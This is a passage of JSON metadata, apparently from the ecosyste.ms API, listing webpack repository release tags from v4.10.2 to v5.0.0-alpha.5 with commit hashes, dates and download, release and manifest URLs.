ags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pk